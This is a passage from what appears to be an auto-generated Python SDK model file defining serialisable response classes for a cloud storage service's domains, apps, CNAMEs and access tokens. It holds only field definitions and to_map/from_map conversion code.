result['auth_ram_app_secret'] = self.auth_ram_app_secret
if self.auth_ram_enable is not None:
result['auth_ram_enable'] = self.auth_ram_enable
if self.created_at is not None:
result['created_at'] = self.created_at
if self.data_hash_name is not None:
result['data_hash_name'] = self.data_hash_name
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.domain_name is not None:
result['domain_name'] = self.domain_name
if self.event_filename_matches is not None:
result['event_filename_matches'] = self.event_filename_matches
if self.event_mns_endpoint is not None:
result['event_mns_endpoint'] = self.event_mns_endpoint
if self.event_mns_topic is not None:
result['event_mns_topic'] = self.event_mns_topic
if self.event_names is not None:
result['event_names'] = self.event_names
if self.event_role_arn is not None:
result['event_role_arn'] = self.event_role_arn
if self.init_drive_enable is not None:
result['init_drive_enable'] = self.init_drive_enable
if self.init_drive_size is not None:
result['init_drive_size'] = self.init_drive_size
if self.init_drive_store_id is not None:
result['init_drive_store_id'] = self.init_drive_store_id
if self.mode is not None:
result['mode'] = self.mode
if self.path_type is not None:
result['path_type'] = self.path_type
if self.published_app_access_strategy is not None:
result['published_app_access_strategy'] = self.published_app_access_strategy.to_map()
if self.sharable is not None:
result['sharable'] = self.sharable
if self.store_level is not None:
result['store_level'] = self.store_level
if self.store_region_list is not None:
result['store_region_list'] = self.store_region_list
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('api_cname') is not None:
self.api_cname = m.get('api_cname')
if m.get('app_cname') is not None:
self.app_cname = m.get('app_cname')
if m.get('auth_alipay_app_id') is not None:
self.auth_alipay_app_id = m.get('auth_alipay_app_id')
if m.get('auth_alipay_enable') is not None:
self.auth_alipay_enable = m.get('auth_alipay_enable')
if m.get('auth_alipay_private_key') is not None:
self.auth_alipay_private_key = m.get('auth_alipay_private_key')
if m.get('auth_cname') is not None:
self.auth_cname = m.get('auth_cname')
if m.get('auth_config') is not None:
self.auth_config = m.get('auth_config')
if m.get('auth_dingding_app_id') is not None:
self.auth_dingding_app_id = m.get('auth_dingding_app_id')
if m.get('auth_dingding_app_secret') is not None:
self.auth_dingding_app_secret = m.get('auth_dingding_app_secret')
if m.get('auth_dingding_enable') is not None:
self.auth_dingding_enable = m.get('auth_dingding_enable')
if m.get('auth_endpoint_enable') is not None:
self.auth_endpoint_enable = m.get('auth_endpoint_enable')
if m.get('auth_ram_app_id') is not None:
self.auth_ram_app_id = m.get('auth_ram_app_id')
if m.get('auth_ram_app_secret') is not None:
self.auth_ram_app_secret = m.get('auth_ram_app_secret')
if m.get('auth_ram_enable') is not None:
self.auth_ram_enable = m.get('auth_ram_enable')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('data_hash_name') is not None:
self.data_hash_name = m.get('data_hash_name')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('domain_name') is not None:
self.domain_name = m.get('domain_name')
if m.get('event_filename_matches') is not None:
self.event_filename_matches = m.get('event_filename_matches')
if m.get('event_mns_endpoint') is not None:
self.event_mns_endpoint = m.get('event_mns_endpoint')
if m.get('event_mns_topic') is not None:
self.event_mns_topic = m.get('event_mns_topic')
if m.get('event_names') is not None:
self.event_names = m.get('event_names')
if m.get('event_role_arn') is not None:
self.event_role_arn = m.get('event_role_arn')
if m.get('init_drive_enable') is not None:
self.init_drive_enable = m.get('init_drive_enable')
if m.get('init_drive_size') is not None:
self.init_drive_size = m.get('init_drive_size')
if m.get('init_drive_store_id') is not None:
self.init_drive_store_id = m.get('init_drive_store_id')
if m.get('mode') is not None:
self.mode = m.get('mode')
if m.get('path_type') is not None:
self.path_type = m.get('path_type')
if m.get('published_app_access_strategy') is not None:
temp_model = AppAccessStrategy()
self.published_app_access_strategy = temp_model.from_map(m['published_app_access_strategy'])
if m.get('sharable') is not None:
self.sharable = m.get('sharable')
if m.get('store_level') is not None:
self.store_level = m.get('store_level')
if m.get('store_region_list') is not None:
self.store_region_list = m.get('store_region_list')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class BaseMediaResponse(TeaModel):
"""
*\
"""
def __init__(
self,
address_line: str = None,
city: str = None,
country: str = None,
district: str = None,
height: int = None,
image_tags: List[SystemTag] = None,
location: str = None,
province: str = None,
time: str = None,
township: str = None,
width: int = None,
):
# address_line
self.address_line = address_line
# city
self.city = city
# country
self.country = country
# district
self.district = district
# height
self.height = height
# system_tags
self.image_tags = image_tags
# location
self.location = location
# province
self.province = province
# time
self.time = time
# township
self.township = township
# width
self.width = width
def validate(self):
if self.image_tags:
for k in self.image_tags:
if k:
k.validate()
def to_map(self):
result = dict()
if self.address_line is not None:
result['address_line'] = self.address_line
if self.city is not None:
result['city'] = self.city
if self.country is not None:
result['country'] = self.country
if self.district is not None:
result['district'] = self.district
if self.height is not None:
result['height'] = self.height
result['image_tags'] = []
if self.image_tags is not None:
for k in self.image_tags:
result['image_tags'].append(k.to_map() if k else None)
if self.location is not None:
result['location'] = self.location
if self.province is not None:
result['province'] = self.province
if self.time is not None:
result['time'] = self.time
if self.township is not None:
result['township'] = self.township
if self.width is not None:
result['width'] = self.width
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('address_line') is not None:
self.address_line = m.get('address_line')
if m.get('city') is not None:
self.city = m.get('city')
if m.get('country') is not None:
self.country = m.get('country')
if m.get('district') is not None:
self.district = m.get('district')
if m.get('height') is not None:
self.height = m.get('height')
self.image_tags = []
if m.get('image_tags') is not None:
for k in m.get('image_tags'):
temp_model = SystemTag()
self.image_tags.append(temp_model.from_map(k))
if m.get('location') is not None:
self.location = m.get('location')
if m.get('province') is not None:
self.province = m.get('province')
if m.get('time') is not None:
self.time = m.get('time')
if m.get('township') is not None:
self.township = m.get('township')
if m.get('width') is not None:
self.width = m.get('width')
return self
class CNameStatus(TeaModel):
"""
*\
"""
def __init__(
self,
bingding_state: str = None,
legal_state: str = None,
remark: str = None,
):
# binding state
self.bingding_state = bingding_state
# legal state
self.legal_state = legal_state
# remark
self.remark = remark
def validate(self):
self.validate_required(self.bingding_state, 'bingding_state')
self.validate_required(self.legal_state, 'legal_state')
self.validate_required(self.remark, 'remark')
def to_map(self):
result = dict()
if self.bingding_state is not None:
result['bingding_state'] = self.bingding_state
if self.legal_state is not None:
result['legal_state'] = self.legal_state
if self.remark is not None:
result['remark'] = self.remark
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('bingding_state') is not None:
self.bingding_state = m.get('bingding_state')
if m.get('legal_state') is not None:
self.legal_state = m.get('legal_state')
if m.get('remark') is not None:
self.remark = m.get('remark')
return self
class CreateDomainResponse(TeaModel):
"""
create domain response
"""
def __init__(
self,
api_cname: str = None,
app_cname: str = None,
auth_alipay_app_id: str = None,
auth_alipay_enable: bool = None,
auth_alipay_private_key: str = None,
auth_cname: str = None,
auth_config: dict = None,
auth_dingding_app_id: str = None,
auth_dingding_app_secret: str = None,
auth_dingding_enable: bool = None,
auth_endpoint_enable: bool = None,
auth_ram_app_id: str = None,
auth_ram_app_secret: str = None,
auth_ram_enable: bool = None,
created_at: str = None,
data_hash_name: str = None,
description: str = None,
domain_id: str = None,
domain_name: str = None,
event_filename_matches: str = None,
event_mns_endpoint: str = None,
event_mns_topic: str = None,
event_names: List[str] = None,
event_role_arn: str = None,
init_drive_enable: bool = None,
init_drive_size: int = None,
init_drive_store_id: str = None,
mode: str = None,
path_type: str = None,
published_app_access_strategy: AppAccessStrategy = None,
sharable: bool = None,
store_level: str = None,
store_region_list: List[str] = None,
updated_at: str = None,
):
# Domain APICName
self.api_cname = api_cname
# Domain AppCName
self.app_cname = app_cname
# 支付宝 App Id
self.auth_alipay_app_id = auth_alipay_app_id
# 是否开启了支付宝认证
self.auth_alipay_enable = auth_alipay_enable
# 支付宝 App Secret
self.auth_alipay_private_key = auth_alipay_private_key
# Domain AuthCName
self.auth_cname = auth_cname
# 登录相关信息
self.auth_config = auth_config
# 钉钉 App Id
self.auth_dingding_app_id = auth_dingding_app_id
# 钉钉 App Secret
self.auth_dingding_app_secret = auth_dingding_app_secret
# 是否开启了钉钉认证
self.auth_dingding_enable = auth_dingding_enable
self.auth_endpoint_enable = auth_endpoint_enable
# RAM App Id
self.auth_ram_app_id = auth_ram_app_id
# RAM App Secret
self.auth_ram_app_secret = auth_ram_app_secret
# 是否开启了 RAM 认证
self.auth_ram_enable = auth_ram_enable
# Domain 创建时间
self.created_at = created_at
# 数据 Hash 算法
self.data_hash_name = data_hash_name
# Domain 描述
self.description = description
# Domain ID
self.domain_id = domain_id
# Domain 描述
self.domain_name = domain_name
# 事件通知 MNS 匹配文件名
self.event_filename_matches = event_filename_matches
# 事件通知 MNS Endpoint
self.event_mns_endpoint = event_mns_endpoint
# 事件通知 MNS Topic
self.event_mns_topic = event_mns_topic
# 事件名列表
self.event_names = event_names
# 事件通知 Role Arn
self.event_role_arn = event_role_arn
# 是否开启了自动初始化 Drive
self.init_drive_enable = init_drive_enable
# 自动初始化 Drive 大小
self.init_drive_size = init_drive_size
# 自动初始化 Drive 所用 Store ID
self.init_drive_store_id = init_drive_store_id
# Domain 类型
self.mode = mode
# Domain 类型
self.path_type = path_type
self.published_app_access_strategy = published_app_access_strategy
# 是否开启了分享
self.sharable = sharable
# 存储级别
self.store_level = store_level
# 存储 Region 列表
self.store_region_list = store_region_list
# Domain 更新时间
self.updated_at = updated_at
def validate(self):
if self.published_app_access_strategy:
self.published_app_access_strategy.validate()
def to_map(self):
result = dict()
if self.api_cname is not None:
result['api_cname'] = self.api_cname
if self.app_cname is not None:
result['app_cname'] = self.app_cname
if self.auth_alipay_app_id is not None:
result['auth_alipay_app_id'] = self.auth_alipay_app_id
if self.auth_alipay_enable is not None:
result['auth_alipay_enable'] = self.auth_alipay_enable
if self.auth_alipay_private_key is not None:
result['auth_alipay_private_key'] = self.auth_alipay_private_key
if self.auth_cname is not None:
result['auth_cname'] = self.auth_cname
if self.auth_config is not None:
result['auth_config'] = self.auth_config
if self.auth_dingding_app_id is not None:
result['auth_dingding_app_id'] = self.auth_dingding_app_id
if self.auth_dingding_app_secret is not None:
result['auth_dingding_app_secret'] = self.auth_dingding_app_secret
if self.auth_dingding_enable is not None:
result['auth_dingding_enable'] = self.auth_dingding_enable
if self.auth_endpoint_enable is not None:
result['auth_endpoint_enable'] = self.auth_endpoint_enable
if self.auth_ram_app_id is not None:
result['auth_ram_app_id'] = self.auth_ram_app_id
if self.auth_ram_app_secret is not None:
result['auth_ram_app_secret'] = self.auth_ram_app_secret
if self.auth_ram_enable is not None:
result['auth_ram_enable'] = self.auth_ram_enable
if self.created_at is not None:
result['created_at'] = self.created_at
if self.data_hash_name is not None:
result['data_hash_name'] = self.data_hash_name
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.domain_name is not None:
result['domain_name'] = self.domain_name
if self.event_filename_matches is not None:
result['event_filename_matches'] = self.event_filename_matches
if self.event_mns_endpoint is not None:
result['event_mns_endpoint'] = self.event_mns_endpoint
if self.event_mns_topic is not None:
result['event_mns_topic'] = self.event_mns_topic
if self.event_names is not None:
result['event_names'] = self.event_names
if self.event_role_arn is not None:
result['event_role_arn'] = self.event_role_arn
if self.init_drive_enable is not None:
result['init_drive_enable'] = self.init_drive_enable
if self.init_drive_size is not None:
result['init_drive_size'] = self.init_drive_size
if self.init_drive_store_id is not None:
result['init_drive_store_id'] = self.init_drive_store_id
if self.mode is not None:
result['mode'] = self.mode
if self.path_type is not None:
result['path_type'] = self.path_type
if self.published_app_access_strategy is not None:
result['published_app_access_strategy'] = self.published_app_access_strategy.to_map()
if self.sharable is not None:
result['sharable'] = self.sharable
if self.store_level is not None:
result['store_level'] = self.store_level
if self.store_region_list is not None:
result['store_region_list'] = self.store_region_list
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('api_cname') is not None:
self.api_cname = m.get('api_cname')
if m.get('app_cname') is not None:
self.app_cname = m.get('app_cname')
if m.get('auth_alipay_app_id') is not None:
self.auth_alipay_app_id = m.get('auth_alipay_app_id')
if m.get('auth_alipay_enable') is not None:
self.auth_alipay_enable = m.get('auth_alipay_enable')
if m.get('auth_alipay_private_key') is not None:
self.auth_alipay_private_key = m.get('auth_alipay_private_key')
if m.get('auth_cname') is not None:
self.auth_cname = m.get('auth_cname')
if m.get('auth_config') is not None:
self.auth_config = m.get('auth_config')
if m.get('auth_dingding_app_id') is not None:
self.auth_dingding_app_id = m.get('auth_dingding_app_id')
if m.get('auth_dingding_app_secret') is not None:
self.auth_dingding_app_secret = m.get('auth_dingding_app_secret')
if m.get('auth_dingding_enable') is not None:
self.auth_dingding_enable = m.get('auth_dingding_enable')
if m.get('auth_endpoint_enable') is not None:
self.auth_endpoint_enable = m.get('auth_endpoint_enable')
if m.get('auth_ram_app_id') is not None:
self.auth_ram_app_id = m.get('auth_ram_app_id')
if m.get('auth_ram_app_secret') is not None:
self.auth_ram_app_secret = m.get('auth_ram_app_secret')
if m.get('auth_ram_enable') is not None:
self.auth_ram_enable = m.get('auth_ram_enable')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('data_hash_name') is not None:
self.data_hash_name = m.get('data_hash_name')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('domain_name') is not None:
self.domain_name = m.get('domain_name')
if m.get('event_filename_matches') is not None:
self.event_filename_matches = m.get('event_filename_matches')
if m.get('event_mns_endpoint') is not None:
self.event_mns_endpoint = m.get('event_mns_endpoint')
if m.get('event_mns_topic') is not None:
self.event_mns_topic = m.get('event_mns_topic')
if m.get('event_names') is not None:
self.event_names = m.get('event_names')
if m.get('event_role_arn') is not None:
self.event_role_arn = m.get('event_role_arn')
if m.get('init_drive_enable') is not None:
self.init_drive_enable = m.get('init_drive_enable')
if m.get('init_drive_size') is not None:
self.init_drive_size = m.get('init_drive_size')
if m.get('init_drive_store_id') is not None:
self.init_drive_store_id = m.get('init_drive_store_id')
if m.get('mode') is not None:
self.mode = m.get('mode')
if m.get('path_type') is not None:
self.path_type = m.get('path_type')
if m.get('published_app_access_strategy') is not None:
temp_model = AppAccessStrategy()
self.published_app_access_strategy = temp_model.from_map(m['published_app_access_strategy'])
if m.get('sharable') is not None:
self.sharable = m.get('sharable')
if m.get('store_level') is not None:
self.store_level = m.get('store_level')
if m.get('store_region_list') is not None:
self.store_region_list = m.get('store_region_list')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class DataCName(TeaModel):
"""
*\
"""
def __init__(
self,
data_cname: str = None,
location: str = None,
):
# datacname
self.data_cname = data_cname
# data location
self.location = location
def validate(self):
self.validate_required(self.data_cname, 'data_cname')
self.validate_required(self.location, 'location')
def to_map(self):
result = dict()
if self.data_cname is not None:
result['data_cname'] = self.data_cname
if self.location is not None:
result['location'] = self.location
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('data_cname') is not None:
self.data_cname = m.get('data_cname')
if m.get('location') is not None:
self.location = m.get('location')
return self
class DomainCNameResponse(TeaModel):
"""
*\
"""
def __init__(
self,
data_cname_list: List[DataCName] = None,
domain_id: str = None,
):
# data cname list
self.data_cname_list = data_cname_list
# domain ID
self.domain_id = domain_id
def validate(self):
self.validate_required(self.data_cname_list, 'data_cname_list')
if self.data_cname_list:
for k in self.data_cname_list:
if k:
k.validate()
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
result['data_cname_list'] = []
if self.data_cname_list is not None:
for k in self.data_cname_list:
result['data_cname_list'].append(k.to_map() if k else None)
if self.domain_id is not None:
result['domain_id'] = self.domain_id
return result
def from_map(self, m: dict = None):
m = m or dict()
self.data_cname_list = []
if m.get('data_cname_list') is not None:
for k in m.get('data_cname_list'):
temp_model = DataCName()
self.data_cname_list.append(temp_model.from_map(k))
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
return self
class GetAppPublicKeyResponse(TeaModel):
"""
*\
"""
def __init__(
self,
app_id: str = None,
public_key: str = None,
):
# App ID
self.app_id = app_id
# RSA加密算法的公钥, PEM格式
self.public_key = public_key
def validate(self):
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.public_key, 'public_key')
def to_map(self):
result = dict()
if self.app_id is not None:
result['app_id'] = self.app_id
if self.public_key is not None:
result['public_key'] = self.public_key
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('public_key') is not None:
self.public_key = m.get('public_key')
return self
class GetAppResponse(TeaModel):
"""
*\
"""
def __init__(
self,
ali_owner_id: str = None,
app_id: str = None,
app_name: str = None,
app_secret: str = None,
created_at: str = None,
description: str = None,
logo: str = None,
provider: str = None,
redirect_uri: str = None,
scope: List[str] = None,
screenshots: List[str] = None,
stage: str = None,
type: str = None,
updated_at: str = None,
):
# App 拥有者
self.ali_owner_id = ali_owner_id
# App ID
self.app_id = app_id
# App名称
self.app_name = app_name
# App 秘钥
self.app_secret = app_secret
# App 创建时间
self.created_at = created_at
# App描述
self.description = description
# App图标
self.logo = logo
# App 提供方
self.provider = provider
# App回调地址
self.redirect_uri = redirect_uri
# App权限列表
self.scope = scope
# App 屏幕截图
self.screenshots = screenshots
# App 当前阶段
self.stage = stage
# App类型
self.type = type
# App 修改时间
self.updated_at = updated_at
def validate(self):
self.validate_required(self.ali_owner_id, 'ali_owner_id')
self.validate_required(self.app_id, 'app_id')
self.validate_required(self.app_name, 'app_name')
if self.app_name is not None:
self.validate_max_length(self.app_name, 'app_name', 128)
self.validate_pattern(self.app_name, 'app_name', '[0-9a-zA-Z]+')
self.validate_required(self.app_secret, 'app_secret')
self.validate_required(self.created_at, 'created_at')
self.validate_required(self.description, 'description')
if self.description is not None:
self.validate_max_length(self.description, 'description', 128)
self.validate_required(self.logo, 'logo')
self.validate_required(self.provider, 'provider')
self.validate_required(self.redirect_uri, 'redirect_uri')
self.validate_required(self.scope, 'scope')
self.validate_required(self.screenshots, 'screenshots')
self.validate_required(self.stage, 'stage')
self.validate_required(self.type, 'type')
self.validate_required(self.updated_at, 'updated_at')
def to_map(self):
result = dict()
if self.ali_owner_id is not None:
result['ali_owner_id'] = self.ali_owner_id
if self.app_id is not None:
result['app_id'] = self.app_id
if self.app_name is not None:
result['app_name'] = self.app_name
if self.app_secret is not None:
result['app_secret'] = self.app_secret
if self.created_at is not None:
result['created_at'] = self.created_at
if self.description is not None:
result['description'] = self.description
if self.logo is not None:
result['logo'] = self.logo
if self.provider is not None:
result['provider'] = self.provider
if self.redirect_uri is not None:
result['redirect_uri'] = self.redirect_uri
if self.scope is not None:
result['scope'] = self.scope
if self.screenshots is not None:
result['screenshots'] = self.screenshots
if self.stage is not None:
result['stage'] = self.stage
if self.type is not None:
result['type'] = self.type
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('ali_owner_id') is not None:
self.ali_owner_id = m.get('ali_owner_id')
if m.get('app_id') is not None:
self.app_id = m.get('app_id')
if m.get('app_name') is not None:
self.app_name = m.get('app_name')
if m.get('app_secret') is not None:
self.app_secret = m.get('app_secret')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('logo') is not None:
self.logo = m.get('logo')
if m.get('provider') is not None:
self.provider = m.get('provider')
if m.get('redirect_uri') is not None:
self.redirect_uri = m.get('redirect_uri')
if m.get('scope') is not None:
self.scope = m.get('scope')
if m.get('screenshots') is not None:
self.screenshots = m.get('screenshots')
if m.get('stage') is not None:
self.stage = m.get('stage')
if m.get('type') is not None:
self.type = m.get('type')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class GetBizCNameInfoResponse(TeaModel):
"""
*\
"""
def __init__(
self,
biz_cname: str = None,
cert_id: str = None,
cert_name: str = None,
cname_status: CNameStatus = None,
cname_type: str = None,
domain_id: str = None,
is_vpc: bool = None,
):
# biz cname
self.biz_cname = biz_cname
# cert name
self.cert_id = cert_id
# cert name
self.cert_name = cert_name
self.cname_status = cname_status
# cname type
self.cname_type = cname_type
# domain ID
self.domain_id = domain_id
# is vpc
self.is_vpc = is_vpc
def validate(self):
if self.cname_status:
self.cname_status.validate()
self.validate_required(self.domain_id, 'domain_id')
def to_map(self):
result = dict()
if self.biz_cname is not None:
result['biz_cname'] = self.biz_cname
if self.cert_id is not None:
result['cert_id'] = self.cert_id
if self.cert_name is not None:
result['cert_name'] = self.cert_name
if self.cname_status is not None:
result['cname_status'] = self.cname_status.to_map()
if self.cname_type is not None:
result['cname_type'] = self.cname_type
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.is_vpc is not None:
result['is_vpc'] = self.is_vpc
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('biz_cname') is not None:
self.biz_cname = m.get('biz_cname')
if m.get('cert_id') is not None:
self.cert_id = m.get('cert_id')
if m.get('cert_name') is not None:
self.cert_name = m.get('cert_name')
if m.get('cname_status') is not None:
temp_model = CNameStatus()
self.cname_status = temp_model.from_map(m['cname_status'])
if m.get('cname_type') is not None:
self.cname_type = m.get('cname_type')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('is_vpc') is not None:
self.is_vpc = m.get('is_vpc')
return self
class GetDomainResponse(TeaModel):
"""
get domain response
"""
def __init__(
self,
api_cname: str = None,
app_cname: str = None,
auth_alipay_app_id: str = None,
auth_alipay_enable: bool = None,
auth_alipay_private_key: str = None,
auth_cname: str = None,
auth_config: dict = None,
auth_dingding_app_id: str = None,
auth_dingding_app_secret: str = None,
auth_dingding_enable: bool = None,
auth_endpoint_enable: bool = None,
auth_ram_app_id: str = None,
auth_ram_app_secret: str = None,
auth_ram_enable: bool = None,
created_at: str = None,
data_hash_name: str = None,
description: str = None,
domain_id: str = None,
domain_name: str = None,
event_filename_matches: str = None,
event_mns_endpoint: str = None,
event_mns_topic: str = None,
event_names: List[str] = None,
event_role_arn: str = None,
init_drive_enable: bool = None,
init_drive_size: int = None,
init_drive_store_id: str = None,
mode: str = None,
path_type: str = None,
published_app_access_strategy: AppAccessStrategy = None,
sharable: bool = None,
store_level: str = None,
store_region_list: List[str] = None,
updated_at: str = None,
):
# Domain APICName
self.api_cname = api_cname
# Domain AppCName
self.app_cname = app_cname
# 支付宝 App Id
self.auth_alipay_app_id = auth_alipay_app_id
# 是否开启了支付宝认证
self.auth_alipay_enable = auth_alipay_enable
# 支付宝 App Secret
self.auth_alipay_private_key = auth_alipay_private_key
# Domain AuthCName
self.auth_cname = auth_cname
# 登录相关信息
self.auth_config = auth_config
# 钉钉 App Id
self.auth_dingding_app_id = auth_dingding_app_id
# 钉钉 App Secret
self.auth_dingding_app_secret = auth_dingding_app_secret
# 是否开启了钉钉认证
self.auth_dingding_enable = auth_dingding_enable
self.auth_endpoint_enable = auth_endpoint_enable
# RAM App Id
self.auth_ram_app_id = auth_ram_app_id
# RAM App Secret
self.auth_ram_app_secret = auth_ram_app_secret
# 是否开启了 RAM 认证
self.auth_ram_enable = auth_ram_enable
# Domain 创建时间
self.created_at = created_at
# 数据 Hash 算法
self.data_hash_name = data_hash_name
# Domain 描述
self.description = description
# Domain ID
self.domain_id = domain_id
# Domain 描述
self.domain_name = domain_name
# 事件通知 MNS 匹配文件名
self.event_filename_matches = event_filename_matches
# 事件通知 MNS Endpoint
self.event_mns_endpoint = event_mns_endpoint
# 事件通知 MNS Topic
self.event_mns_topic = event_mns_topic
# 事件名列表
self.event_names = event_names
# 事件通知 Role Arn
self.event_role_arn = event_role_arn
# 是否开启了自动初始化 Drive
self.init_drive_enable = init_drive_enable
# 自动初始化 Drive 大小
self.init_drive_size = init_drive_size
# 自动初始化 Drive 所用 Store ID
self.init_drive_store_id = init_drive_store_id
# Domain 类型
self.mode = mode
# Domain 类型
self.path_type = path_type
self.published_app_access_strategy = published_app_access_strategy
# 是否开启了分享
self.sharable = sharable
# 存储级别
self.store_level = store_level
# 存储 Region 列表
self.store_region_list = store_region_list
# Domain 更新时间
self.updated_at = updated_at
def validate(self):
if self.published_app_access_strategy:
self.published_app_access_strategy.validate()
def to_map(self):
result = dict()
if self.api_cname is not None:
result['api_cname'] = self.api_cname
if self.app_cname is not None:
result['app_cname'] = self.app_cname
if self.auth_alipay_app_id is not None:
result['auth_alipay_app_id'] = self.auth_alipay_app_id
if self.auth_alipay_enable is not None:
result['auth_alipay_enable'] = self.auth_alipay_enable
if self.auth_alipay_private_key is not None:
result['auth_alipay_private_key'] = self.auth_alipay_private_key
if self.auth_cname is not None:
result['auth_cname'] = self.auth_cname
if self.auth_config is not None:
result['auth_config'] = self.auth_config
if self.auth_dingding_app_id is not None:
result['auth_dingding_app_id'] = self.auth_dingding_app_id
if self.auth_dingding_app_secret is not None:
result['auth_dingding_app_secret'] = self.auth_dingding_app_secret
if self.auth_dingding_enable is not None:
result['auth_dingding_enable'] = self.auth_dingding_enable
if self.auth_endpoint_enable is not None:
result['auth_endpoint_enable'] = self.auth_endpoint_enable
if self.auth_ram_app_id is not None:
result['auth_ram_app_id'] = self.auth_ram_app_id
if self.auth_ram_app_secret is not None:
result['auth_ram_app_secret'] = self.auth_ram_app_secret
if self.auth_ram_enable is not None:
result['auth_ram_enable'] = self.auth_ram_enable
if self.created_at is not None:
result['created_at'] = self.created_at
if self.data_hash_name is not None:
result['data_hash_name'] = self.data_hash_name
if self.description is not None:
result['description'] = self.description
if self.domain_id is not None:
result['domain_id'] = self.domain_id
if self.domain_name is not None:
result['domain_name'] = self.domain_name
if self.event_filename_matches is not None:
result['event_filename_matches'] = self.event_filename_matches
if self.event_mns_endpoint is not None:
result['event_mns_endpoint'] = self.event_mns_endpoint
if self.event_mns_topic is not None:
result['event_mns_topic'] = self.event_mns_topic
if self.event_names is not None:
result['event_names'] = self.event_names
if self.event_role_arn is not None:
result['event_role_arn'] = self.event_role_arn
if self.init_drive_enable is not None:
result['init_drive_enable'] = self.init_drive_enable
if self.init_drive_size is not None:
result['init_drive_size'] = self.init_drive_size
if self.init_drive_store_id is not None:
result['init_drive_store_id'] = self.init_drive_store_id
if self.mode is not None:
result['mode'] = self.mode
if self.path_type is not None:
result['path_type'] = self.path_type
if self.published_app_access_strategy is not None:
result['published_app_access_strategy'] = self.published_app_access_strategy.to_map()
if self.sharable is not None:
result['sharable'] = self.sharable
if self.store_level is not None:
result['store_level'] = self.store_level
if self.store_region_list is not None:
result['store_region_list'] = self.store_region_list
if self.updated_at is not None:
result['updated_at'] = self.updated_at
return result
def from_map(self, m: dict = None):
m = m or dict()
if m.get('api_cname') is not None:
self.api_cname = m.get('api_cname')
if m.get('app_cname') is not None:
self.app_cname = m.get('app_cname')
if m.get('auth_alipay_app_id') is not None:
self.auth_alipay_app_id = m.get('auth_alipay_app_id')
if m.get('auth_alipay_enable') is not None:
self.auth_alipay_enable = m.get('auth_alipay_enable')
if m.get('auth_alipay_private_key') is not None:
self.auth_alipay_private_key = m.get('auth_alipay_private_key')
if m.get('auth_cname') is not None:
self.auth_cname = m.get('auth_cname')
if m.get('auth_config') is not None:
self.auth_config = m.get('auth_config')
if m.get('auth_dingding_app_id') is not None:
self.auth_dingding_app_id = m.get('auth_dingding_app_id')
if m.get('auth_dingding_app_secret') is not None:
self.auth_dingding_app_secret = m.get('auth_dingding_app_secret')
if m.get('auth_dingding_enable') is not None:
self.auth_dingding_enable = m.get('auth_dingding_enable')
if m.get('auth_endpoint_enable') is not None:
self.auth_endpoint_enable = m.get('auth_endpoint_enable')
if m.get('auth_ram_app_id') is not None:
self.auth_ram_app_id = m.get('auth_ram_app_id')
if m.get('auth_ram_app_secret') is not None:
self.auth_ram_app_secret = m.get('auth_ram_app_secret')
if m.get('auth_ram_enable') is not None:
self.auth_ram_enable = m.get('auth_ram_enable')
if m.get('created_at') is not None:
self.created_at = m.get('created_at')
if m.get('data_hash_name') is not None:
self.data_hash_name = m.get('data_hash_name')
if m.get('description') is not None:
self.description = m.get('description')
if m.get('domain_id') is not None:
self.domain_id = m.get('domain_id')
if m.get('domain_name') is not None:
self.domain_name = m.get('domain_name')
if m.get('event_filename_matches') is not None:
self.event_filename_matches = m.get('event_filename_matches')
if m.get('event_mns_endpoint') is not None:
self.event_mns_endpoint = m.get('event_mns_endpoint')
if m.get('event_mns_topic') is not None:
self.event_mns_topic = m.get('event_mns_topic')
if m.get('event_names') is not None:
self.event_names = m.get('event_names')
if m.get('event_role_arn') is not None:
self.event_role_arn = m.get('event_role_arn')
if m.get('init_drive_enable') is not None:
self.init_drive_enable = m.get('init_drive_enable')
if m.get('init_drive_size') is not None:
self.init_drive_size = m.get('init_drive_size')
if m.get('init_drive_store_id') is not None:
self.init_drive_store_id = m.get('init_drive_store_id')
if m.get('mode') is not None:
self.mode = m.get('mode')
if m.get('path_type') is not None:
self.path_type = m.get('path_type')
if m.get('published_app_access_strategy') is not None:
temp_model = AppAccessStrategy()
self.published_app_access_strategy = temp_model.from_map(m['published_app_access_strategy'])
if m.get('sharable') is not None:
self.sharable = m.get('sharable')
if m.get('store_level') is not None:
self.store_level = m.get('store_level')
if m.get('store_region_list') is not None:
self.store_region_list = m.get('store_region_list')
if m.get('updated_at') is not None:
self.updated_at = m.get('updated_at')
return self
class GetUserAccessTokenRequest(TeaModel):
"""
*\
"""
def __init__(
self,
headers: Dict[str, str] = None,
role: str = None,
user_id: str = None,
):
self.headers = headers
# 角色
self.role = role
# 用户 ID
self.user_id = user_id
def validate(self):
self.validate_required(self.user_id, 'user_id')
def to_map(self):
result = dict()
if self.headers is not None:
result['headers'] = self.headers
if self.role is not None:
result['role'] = self.role
if self.user_id is not None:
